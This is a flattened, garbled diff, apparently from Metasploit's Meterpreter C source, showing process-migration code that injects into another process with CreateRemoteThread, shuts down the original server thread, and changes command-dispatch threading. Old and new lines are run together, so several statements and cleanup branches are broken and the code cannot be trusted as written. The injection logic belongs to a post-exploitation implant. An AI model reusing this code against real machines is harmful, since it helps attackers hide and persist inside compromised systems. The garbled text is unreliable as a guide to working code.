// XXX: Skip SSL shutdown/notify, as it queues a TLS alert on the socket.
// Shut down our SSL session
// ssl_close_notify(&remote->ssl);
// ssl_free(&remote->ssl);
response = NULL;
// Create the thread in the remote process
if (!(thread = CreateRemoteThread(process, NULL, 1024*1024, (LPTHREAD_START_ROUTINE)codeBase, dataBase, 0, &threadId)))
result = GetLastError();
// Wait at most 5 seconds for the event to be set letting us know that it's finished
if (WaitForSingleObjectEx(event, 5000, FALSE) != WAIT_OBJECT_0 )
result = GetLastError();
// Signal the main server thread to begin the shutdown as migration has been successfull. // Signal the main server thread to begin the shutdown as migration has been successfull.
dprintf("[SYSTEM] Shutting down the Meterpreter thread 1 (signaling main thread)..."); dprintf("[MIGRATE] Shutting down the Meterpreter thread 1 (signaling main thread)...");
thread_sigterm( serverThread ); thread_sigterm( serverThread );
} while (0); dwResult = ERROR_SUCCESS;
} while( 0 );
// If we failed and have not sent the response, do so now // If we failed and have not sent the response, do so now
if (result != ERROR_SUCCESS && response) if( dwResult != ERROR_SUCCESS && response )
packet_transmit_response(result, remote, response); packet_transmit_response( dwResult, remote, response );
// Cleanup // Cleanup...
if (process) if( hProcess )
CloseHandle(process); CloseHandle( hProcess );
if (thread)
if (event)
return result; if( hEvent )
CloseHandle( hEvent );
return dwResult;
} }

View File

@ -81,6 +81,8 @@ typedef enum
// Cryptography // Cryptography

View File

@ -315,11 +315,11 @@ static DWORD server_dispatch( Remote * remote )
break; break;
cpt = thread_create( command_process_thread, remote, packet ); cpt = thread_create( command_process_thread, remote, packet );
if( cpt )
dprintf( "[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle ); {
dprintf( "[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle );
if( cpt != NULL )
thread_run( cpt ); thread_run( cpt );
} }
else if( result < 0 ) else if( result < 0 )
{ {